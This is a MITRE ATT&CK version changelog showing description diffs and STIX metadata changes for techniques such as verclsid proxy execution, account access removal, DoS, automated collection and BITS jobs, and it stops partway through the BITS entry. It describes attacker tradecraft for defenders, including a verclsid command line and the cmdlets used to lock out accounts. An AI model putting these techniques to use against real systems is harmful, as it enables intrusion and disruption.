t1Adversaries may abuse verclsid.exe to proxy execution of malt1Adversaries may abuse verclsid.exe to proxy execution of mal
>icious code. Verclsid.exe is known as the Extension CLSID Ve>icious code. Verclsid.exe is known as the Extension CLSID Ve
>rification Host and is responsible for verifying each shell >rification Host and is responsible for verifying each shell 
>extension before they are used by Windows Explorer or the Wi>extension before they are used by Windows Explorer or the Wi
>ndows Shell.(Citation: WinOSBite verclsid.exe)  Adversaries >ndows Shell.(Citation: WinOSBite verclsid.exe)  Adversaries 
>may abuse verclsid.exe to execute malicious payloads. This m>may abuse verclsid.exe to execute malicious payloads. This m
>ay be achieved by running <code>verclsid.exe /S /C {CLSID}</>ay be achieved by running <code>verclsid.exe /S /C {CLSID}</
>code>, where the file is referenced by a Class ID (CLSID), a>code>, where the file is referenced by a Class ID (CLSID), a
> unique identification number used to identify COM objects. > unique identification number used to identify COM objects. 
>COM payloads executed by verclsid.exe may be able to perform>COM payloads executed by verclsid.exe may be able to perform
> various malicious actions, such as loading and executing CO> various malicious actions, such as loading and executing CO
>M scriptlets (SCT) from remote servers (similar to [Regsvr32>M scriptlets (SCT) from remote servers (similar to [Regsvr32
>](https://attack.mitre.org/techniques/T1218/010)). Since it >](https://attack.mitre.org/techniques/T1218/010)). Since the
>is signed and native on Windows systems, proxying execution > binary may be signed and/or native on Windows systems, prox
>via verclsid.exe may bypass application control solutions th>ying execution via verclsid.exe may bypass application contr
>at do not account for its potential abuse.(Citation: LOLBAS >ol solutions that do not account for its potential abuse.(Ci
>Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOP>tation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(
>S Abusing the COM Registry)(Citation: Nick Tyrer GitHub) >Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Ty
 >rer GitHub) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2020-08-19 19:29:18.138000+00:002022-05-20 17:35:28.221000+00:00
descriptionAdversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe) Adversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running verclsid.exe /S /C {CLSID}, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since it is signed and native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe) Adversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running verclsid.exe /S /C {CLSID}, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since the binary may be signed and/or native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub)
external_references[1]['source_name']WinOSBite verclsid.exeBOHOPS Abusing the COM Registry
external_references[1]['description']verclsid-exe. (2019, December 17). verclsid.exe File Information - What is it & How to Block . Retrieved August 10, 2020.BOHOPS. (2018, August 18). Abusing the COM Registry Structure (Part 2): Hijacking & Loading Techniques. Retrieved August 10, 2020.
external_references[1]['url']https://www.winosbite.com/verclsid-exe/ https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
external_references[2]['source_name']LOLBAS VerclsidRed Canary Verclsid.exe
external_references[2]['description']LOLBAS. (n.d.). Verclsid.exe. Retrieved August 10, 2020.Haag, M., Levan, K. (2017, April 6). Old Phishing Attacks Deploy a New Methodology: Verclsid.exe. Retrieved August 10, 2020.
external_references[2]['url']https://lolbas-project.github.io/lolbas/Binaries/Verclsid/https://redcanary.com/blog/verclsid-exe-threat-detection/
external_references[3]['source_name']Red Canary Verclsid.exeLOLBAS Verclsid
external_references[3]['description']Haag, M., Levan, K. (2017, April 6). Old Phishing Attacks Deploy a New Methodology: Verclsid.exe. Retrieved August 10, 2020.LOLBAS. (n.d.). Verclsid.exe. Retrieved August 10, 2020.
external_references[3]['url']https://redcanary.com/blog/verclsid-exe-threat-detection/https://lolbas-project.github.io/lolbas/Binaries/Verclsid/
external_references[4]['source_name']BOHOPS Abusing the COM RegistryNick Tyrer GitHub
external_references[4]['description']BOHOPS. (2018, August 18). Abusing the COM Registry Structure (Part 2): Hijacking & Loading Techniques. Retrieved August 10, 2020.Tyrer, N. (n.d.). Instructions. Retrieved August 10, 2020.
external_references[4]['url']https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
external_references[5]['source_name']Nick Tyrer GitHubWinOSBite verclsid.exe
external_references[5]['description']Tyrer, N. (n.d.). Instructions. Retrieved August 10, 2020.verclsid-exe. (2019, December 17). verclsid.exe File Information - What is it & How to Block . Retrieved August 10, 2020.
external_references[5]['url']https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5https://www.winosbite.com/verclsid-exe/
x_mitre_version1.02.0
Minor Version Changes

[T1531] Account Access Removal

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may interrupt availability of system and networkt1Adversaries may interrupt availability of system and network
> resources by inhibiting access to accounts utilized by legi> resources by inhibiting access to accounts utilized by legi
>timate users. Accounts may be deleted, locked, or manipulate>timate users. Accounts may be deleted, locked, or manipulate
>d (ex: changed credentials) to remove access to accounts.  A>d (ex: changed credentials) to remove access to accounts. Ad
>dversaries may also subsequently log off and/or reboot boxes>versaries may also subsequently log off and/or perform a [Sy
> to set malicious changes into place.(Citation: CarbonBlack >stem Shutdown/Reboot](https://attack.mitre.org/techniques/T1
>LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)>529) to set malicious changes into place.(Citation: CarbonBl
 >ack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)  In W
 >indows, [Net](https://attack.mitre.org/software/S0039) utili
 >ty, <code>Set-LocalUser</code> and <code>Set-ADAccountPasswo
 >rd</code> [PowerShell](https://attack.mitre.org/techniques/T
 >1059/001) cmdlets may be used by adversaries to modify user 
 >accounts. In Linux, the <code>passwd</code> utility may be u
 >sed to change passwords. Accounts could also be disabled by 
 >Group Policy.   Adversaries who use ransomware may first per
 >form this and other Impact behaviors, such as [Data Destruct
 >ion](https://attack.mitre.org/techniques/T1485) and [Defacem
 >ent](https://attack.mitre.org/techniques/T1491), before comp
 >leting the [Data Encrypted for Impact](https://attack.mitre.
 >org/techniques/T1486) objective. 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator', 'root', 'SYSTEM']
values_changed
STIX FieldOld valueNew Value
modified2020-07-14 19:15:29.911000+00:002022-04-19 22:57:27.449000+00:00
descriptionAdversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or reboot boxes to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019) In Windows, [Net](https://attack.mitre.org/software/S0039) utility, Set-LocalUser and Set-ADAccountPassword [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. In Linux, the passwd utility may be used to change passwords. Accounts could also be disabled by Group Policy. Adversaries who use ransomware may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective.
external_references[2]['description']Harbison, M.. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019.Harbison, M. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019.
x_mitre_data_sources[1]User Account: User Account ModificationActive Directory: Active Directory Object Modification
x_mitre_data_sources[2]Active Directory: Active Directory Object ModificationUser Account: User Account Modification
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsOffice 365
x_mitre_platformsSaaS

[T1499.003] Endpoint Denial of Service: Application Exhaustion Flood

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may target resource intensive features of web apt1Adversaries may target resource intensive features of applic
>plications to cause a denial of service (DoS). Specific feat>ations to cause a denial of service (DoS), denying availabil
>ures in web applications may be highly resource intensive. R>ity to those applicationsFor example, specific features in
>epeated requests to those features may be able to exhaust sy> web applications may be highly resource intensive. Repeated
>stem resources and deny access to the application or the ser> requests to those features may be able to exhaust system re
>ver itself. (Citation: Arbor AnnualDoSreport Jan 2018)>sources and deny access to the application or the server its
 >elf.(Citation: Arbor AnnualDoSreport Jan 2018)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-03-29 16:08:52.118000+00:002022-03-25 18:07:45.176000+00:00
descriptionAdversaries may target resource intensive features of web applications to cause a denial of service (DoS). Specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself. (Citation: Arbor AnnualDoSreport Jan 2018)Adversaries may target resource intensive features of applications to cause a denial of service (DoS), denying availability to those applications. For example, specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself.(Citation: Arbor AnnualDoSreport Jan 2018)
x_mitre_data_sources[0]Sensor Health: Host StatusNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Application Log: Application Log ContentSensor Health: Host Status
x_mitre_data_sources[2]Network Traffic: Network Traffic ContentNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[3]Network Traffic: Network Traffic FlowApplication Log: Application Log Content
x_mitre_version1.11.2

[T1010] Application Window Discovery

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may attempt to get a listing of open applicationt1Adversaries may attempt to get a listing of open application
> windows. Window listings could convey information about how> windows. Window listings could convey information about how
> the system is used or give context to information collected> the system is used or give context to information collected
> by a keylogger.> by a keylogger.(Citation: Prevailion DarkWatchman 2021)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2020-03-26 15:44:27.068000+00:002022-04-19 02:07:41.751000+00:00
descriptionAdversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.(Citation: Prevailion DarkWatchman 2021)
x_mitre_data_sources[0]Process: Process CreationCommand: Command Execution
x_mitre_data_sources[1]Command: Command ExecutionProcess: Process Creation
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Prevailion DarkWatchman 2021', 'description': 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022.', 'url': 'https://www.prevailion.com/darkwatchman-new-fileless-techniques/'}
x_mitre_platformsLinux

[T1499.004] Endpoint Denial of Service: Application or System Exploitation

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may exploit software vulnerabilities that can cat1Adversaries may exploit software vulnerabilities that can ca
>use an application or system to crash and deny availability >use an application or system to crash and deny availability 
>to users. (Citation: Sucuri BIND9 August 2015) Some systems >to users. (Citation: Sucuri BIND9 August 2015) Some systems 
>may automatically restart critical applications and services>may automatically restart critical applications and services
> when crashes occur, but they can likely be re-exploited to > when crashes occur, but they can likely be re-exploited to 
>cause a persistent DoS condition.>cause a persistent denial of service (DoS) condition.  Adver
 >saries may exploit known or zero-day vulnerabilities to cras
 >h applications and/or systems, which may also lead to depend
 >ent applications and/or systems to be in a DoS condition. Cr
 >ashed or restarted applications or systems may also have oth
 >er effects such as [Data Destruction](https://attack.mitre.o
 >rg/techniques/T1485), [Firmware Corruption](https://attack.m
 >itre.org/techniques/T1495), [Service Stop](https://attack.mi
 >tre.org/techniques/T1489) etc. which may further cause a DoS
 > condition and deny availability to critical information, ap
 >plications and/or systems. 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-03-29 16:09:41.559000+00:002022-03-25 18:11:13.604000+00:00
descriptionAdversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent DoS condition.Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent denial of service (DoS) condition. Adversaries may exploit known or zero-day vulnerabilities to crash applications and/or systems, which may also lead to dependent applications and/or systems to be in a DoS condition. Crashed or restarted applications or systems may also have other effects such as [Data Destruction](https://attack.mitre.org/techniques/T1485), [Firmware Corruption](https://attack.mitre.org/techniques/T1495), [Service Stop](https://attack.mitre.org/techniques/T1489) etc. which may further cause a DoS condition and deny availability to critical information, applications and/or systems.
x_mitre_data_sources[2]Network Traffic: Network Traffic ContentNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[3]Network Traffic: Network Traffic FlowNetwork Traffic: Network Traffic Content
x_mitre_version1.11.2

[T1560.001] Archive Collected Data: Archive via Utility

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1An adversary may compress or encrypt data that is collected t1Adversaries may use utilities to compress and/or encrypt col
>prior to exfiltration using 3rd party utilities. Many utilit>lected data prior to exfiltration. Many utilities include fu
>ies exist that can archive data, including 7-Zip(Citation: 7>nctionalities to compress, encrypt, or otherwise package dat
>zip Homepage), WinRAR(Citation: WinRAR Homepage), and WinZip>a into a format that is easier/more secure to transport.  Ad
>(Citation: WinZip Homepage). Most utilities include function>versaries may abuse various utilities to compress or encrypt
>ality to encrypt and/or compress data.  Some 3rd party utili> data before exfiltration. Some third party utilities may be
>ties may be preinstalled, such as `tar` on Linux and macOS o> preinstalled, such as <code>tar</code> on Linux and macOS o
>r `zip` on Windows systems.>r <code>zip</code> on Windows systems. On Windows, <code>dia
 >ntz</code> or <code> makecab</code> may be used to package c
 >ollected files into a cabinet (.cab) file. <code>diantz</cod
 >e> may also be used to download and compress files from remo
 >te locations (i.e. [Remote Data Staging](https://attack.mitr
 >e.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) A
 >dditionally, <code>xcopy</code> on Windows can copy files an
 >d directories with a variety of options.  Adversaries may us
 >e also third party utilities, such as 7-Zip, WinRAR, and Win
 >Zip, to perform similar activities.(Citation: 7zip Homepage)
 >(Citation: WinRAR Homepage)(Citation: WinZip Homepage)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Mayan Arora aka Mayan Mohan']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-25 21:54:37.374000+00:002022-04-20 17:17:48.612000+00:00
descriptionAn adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities. Many utilities exist that can archive data, including 7-Zip(Citation: 7zip Homepage), WinRAR(Citation: WinRAR Homepage), and WinZip(Citation: WinZip Homepage). Most utilities include functionality to encrypt and/or compress data. Some 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS or `zip` on Windows systems.Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport. Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as tar on Linux and macOS or zip on Windows systems. On Windows, diantz or makecab may be used to package collected files into a cabinet (.cab) file. diantz may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) Additionally, xcopy on Windows can copy files and directories with a variety of options. Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)
external_references[1]['source_name']7zip HomepageWinRAR Homepage
external_references[1]['description']I. Pavlov. (2019). 7-Zip. Retrieved February 20, 2020.A. Roshal. (2020). RARLAB. Retrieved February 20, 2020.
external_references[1]['url']https://www.7-zip.org/https://www.rarlab.com/
external_references[2]['source_name']WinRAR HomepageWinZip Homepage
external_references[2]['description']A. Roshal. (2020). RARLAB. Retrieved February 20, 2020.Corel Corporation. (2020). WinZip. Retrieved February 20, 2020.
external_references[2]['url']https://www.rarlab.com/https://www.winzip.com/win/en/
external_references[3]['source_name']WinZip Homepage7zip Homepage
external_references[3]['description']Corel Corporation. (2020). WinZip. Retrieved February 20, 2020.I. Pavlov. (2019). 7-Zip. Retrieved February 20, 2020.
external_references[3]['url']https://www.winzip.com/win/en/https://www.7-zip.org/
external_references[4]['source_name']Wikipedia File Header Signaturesdiantz.exe_lolbas
external_references[4]['description']Wikipedia. (2016, March 31). List of file signatures. Retrieved April 22, 2016.Living Off The Land Binaries, Scripts and Libraries (LOLBAS). (n.d.). Diantz.exe. Retrieved October 25, 2021.
external_references[4]['url']https://en.wikipedia.org/wiki/List_of_file_signatureshttps://lolbas-project.github.io/lolbas/Binaries/Diantz/
x_mitre_data_sources[1]Command: Command ExecutionFile: File Creation
x_mitre_data_sources[2]File: File CreationCommand: Command Execution
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Wikipedia File Header Signatures', 'description': 'Wikipedia. (2016, March 31). List of file signatures. Retrieved April 22, 2016.', 'url': 'https://en.wikipedia.org/wiki/List_of_file_signatures'}

[T1119] Automated Collection

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Once established within a system or network, an adversary mat1Once established within a system or network, an adversary ma
>y use automated techniques for collecting internal data. Met>y use automated techniques for collecting internal data. Met
>hods for performing this technique could include use of a [C>hods for performing this technique could include use of a [C
>ommand and Scripting Interpreter](https://attack.mitre.org/t>ommand and Scripting Interpreter](https://attack.mitre.org/t
>echniques/T1059) to search for and copy information fitting >echniques/T1059) to search for and copy information fitting 
>set criteria such as file type, location, or name at specifi>set criteria such as file type, location, or name at specifi
>c time intervals. This functionality could also be built int>c time intervals. In cloud-based environments, adversaries m
>o remote access tools.   This technique may incorporate use >ay also use cloud APIs, command line interfaces, or extract,
>of other techniques such as [File and Directory Discovery](h> transform, and load (ETL) services to automatically collect
>ttps://attack.mitre.org/techniques/T1083) and [Lateral Tool > data. This functionality could also be built into remote ac
>Transfer](https://attack.mitre.org/techniques/T1570) to iden>cess tools.   This technique may incorporate use of other te
>tify and move files.>chniques such as [File and Directory Discovery](https://atta
 >ck.mitre.org/techniques/T1083) and [Lateral Tool Transfer](h
 >ttps://attack.mitre.org/techniques/T1570) to identify and mo
 >ve files, as well as [Cloud Service Dashboard](https://attac
 >k.mitre.org/techniques/T1538) and [Cloud Storage Object Disc
 >overy](https://attack.mitre.org/techniques/T1619) to identif
 >y resources in cloud environments.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Praetorian']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2020-03-31 22:18:43.019000+00:002022-04-11 18:40:24.795000+00:00
descriptionOnce established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files.Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. In cloud-based environments, adversaries may also use cloud APIs, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data. This functionality could also be built into remote access tools. This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files, as well as [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538) and [Cloud Storage Object Discovery](https://attack.mitre.org/techniques/T1619) to identify resources in cloud environments.
x_mitre_detectionDepending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending on the system and network environment. Automated collection may occur along with other techniques such as [Data Staged](https://attack.mitre.org/techniques/T1074). As such, file access monitoring that shows an unusual process performing sequential file opens and potentially copy actions to another location on the file system for many files at once may indicate automated collection behavior. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending on the system and network environment. Automated collection may occur along with other techniques such as [Data Staged](https://attack.mitre.org/techniques/T1074). As such, file access monitoring that shows an unusual process performing sequential file opens and potentially copy actions to another location on the file system for many files at once may indicate automated collection behavior. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), as well as through cloud APIs and command line interfaces.
x_mitre_system_requirements[0]Permissions to access directories and files that store information of interest.Permissions to access directories, files, and API endpoints that store information of interest.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Access
x_mitre_platformsIaaS
x_mitre_platformsSaaS
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Access

[T1197] BITS Jobs

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may abuse BITS jobs to persistently execute or ct1Adversaries may abuse BITS jobs to persistently execute code
>lean up after malicious payloads. Windows Background Intelli> and perform various background tasks. Windows Background In
>gent Transfer Service (BITS) is a low-bandwidth, asynchronou>telligent Transfer Service (BITS) is a low-bandwidth, asynch
>s file transfer mechanism exposed through [Component Object >ronous file transfer mechanism exposed through [Component Ob
>Model](https://attack.mitre.org/techniques/T1559/001) (COM).>ject Model](https://attack.mitre.org/techniques/T1559/001) (
>(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is >COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BIT
>commonly used by updaters, messengers, and other application>S is commonly used by updaters, messengers, and other applic
>s preferred to operate in the background (using available id>ations preferred to operate in the background (using availab
>le bandwidth) without interrupting other networked applicati>le idle bandwidth) without interrupting other networked appl
>ons. File transfer tasks are implemented as BITS jobs, which>ications. File transfer tasks are implemented as BITS jobs, 
> contain a queue of one or more file operations.  The interf>which contain a queue of one or more file operations.  The i
>ace to create and manage BITS jobs is accessible through [Po>nterface to create and manage BITS jobs is accessible throug
>werShell](https://attack.mitre.org/techniques/T1059/001) and>h [PowerShell](https://attack.mitre.org/techniques/T1059/001
> the [BITSAdmin](https://attack.mitre.org/software/S0190) to>) and the [BITSAdmin](https://attack.mitre.org/software/S019
>ol.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)>0) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSA
>  Adversaries may abuse BITS to download, execute, and even >dmin)  Adversaries may abuse BITS to download (e.g. [Ingress
>clean up after running malicious code. BITS tasks are self-c> Tool Transfer](https://attack.mitre.org/techniques/T1105)),
>ontained in the BITS job database, without new files or regi> execute, and even clean up after running malicious code (e.
>stry modifications, and often permitted by host firewalls.(C>g. [Indicator Removal](https://attack.mitre.org/techniques/T
>itation: CTU BITS Malware June 2016)(Citation: Mondok Window>1070)). BITS tasks are self-contained in the BITS job databa
>s PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007)>se, without new files or registry modifications, and often p
> BITS enabled execution may also enable persistence by creat>ermitted by host firewalls.(Citation: CTU BITS Malware June 
>ing long-standing jobs (the default maximum lifetime is 90 d>2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Cita
>ays and extendable) or invoking an arbitrary program when a >tion: Symantec BITS May 2007) BITS enabled execution may als
>job completes or errors (including after system reboots).(Ci>o enable persistence by creating long-standing jobs (the def
>tation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malwa>ault maximum lifetime is 90 days and extendable) or invoking
>re June 2016)  BITS upload functionalities can also be used > an arbitrary program when a job completes or errors (includ
>to perform [Exfiltration Over Alternative Protocol](https://>ing after system reboots).(Citation: PaloAlto UBoatRAT Nov 2
>attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malwa>017)(Citation: CTU BITS Malware June 2016)  BITS upload func
>re June 2016)>tionalities can also be used to perform [Exfiltration Over A
 >lternative Protocol](https://attack.mitre.org/techniques/T10
 >48).(Citation: CTU BITS Malware June 2016)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator', 'SYSTEM']
values_changed
STIX FieldOld valueNew Value
modified2021-04-13 21:36:04.956000+00:002022-09-14 19:21:26.447000+00:00
descriptionAdversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin) Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016) BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. The interface to create and manage BITS jobs is accessible through 